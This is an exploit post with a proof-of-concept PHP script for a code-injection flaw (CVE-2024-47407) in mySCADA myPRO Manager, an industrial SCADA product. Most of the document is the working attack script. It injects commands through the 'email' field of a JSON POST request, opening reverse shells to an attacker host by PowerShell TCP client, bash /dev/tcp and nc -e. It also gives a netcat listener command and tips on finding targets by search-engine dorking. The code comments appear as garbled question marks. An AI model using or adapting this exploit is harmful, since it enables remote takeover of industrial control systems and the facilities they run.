MySCADA MyPRO Manager 1.2 PHP Code Injection

MySCADA MyPRO Manager 1.2 PHP Code Injection

=============================================================================================================================================
| # Title MySCADA MyPRO Manager 1.2 PHP Code Injection

=============================================================================================================================================
| # Title : MySCADA MyPRO Manager 1.2 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.myscada.org/mypro/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description:

PHP Code Injection Vulnerability in mySCADA myPRO Manager versions up to v1.2, aka CVE-2024-47407.

Send an HTTP POST request to /get with the email data containing the command to be executed.

Check if the response is 200, meaning the command was executed successfully.

Before running the code, open a Netcat window on your attacking machine and listen for connections on the specified port: nc -lvnp ATTACKER_PORT

(Related : https://packetstorm.news/files/id/189175/ Related CVE numbers: CVE-2024-47407 ) .

[+] save code as poc.php .

[+] Set Target : line 4 + 5 + 6

[+] USage : php poc.php

[+] PayLoad :

<?php
// by indoushka
// ??????? CVE-2024-47407 ?? mySCADA myPRO Manager ?????? ??? Shell Reverse ??? ????? ????? ??????

$target = "http://target-ip:34022/get"; // ?????? ?? IP ??????
$attacker_ip = "ATTACKER_IP"; // ?????? ?? IP ???????
$attacker_port = "ATTACKER_PORT"; // ?????? ??????? ???? ?????? ????

// ??? ???? ??????? ?????? ??????? ????????
$windows_payload = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}; \$client.Close()\"";

$linux_payload = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";

$mac_payload = "osascript -e 'do shell script \"nc -e /bin/bash $attacker_ip $attacker_port\"'";

// ????? ?????? ?????????? ???????? ??? ???????
$email_injection = rand(100, 999) . "@" . rand(1000, 9999) . ".com&&";

$email_injection .= "if exist C:\\Windows\\System32\\ cmd /c \"$windows_payload\"";
$email_injection .= "; if [ -f /bin/bash ]; then $linux_payload; fi";
$email_injection .= "; if [ -f /usr/bin/osascript ]; then $mac_payload; fi";
$email_injection .= " #";

// ????? ?????? ?????
$data = json_encode([
"command" => "testEmail",
"email" => $email_injection
]);

// ????? ?????
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// ?????? ?? ???? ?????????
if ($http_code == 200) {
echo "[+] ?? ????? ????? Shell Reverse ?????! ????? ??????? ??? ?????? $attacker_port\n";
} else {
echo "[-] ??? ???????? ???? ?????? ????.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================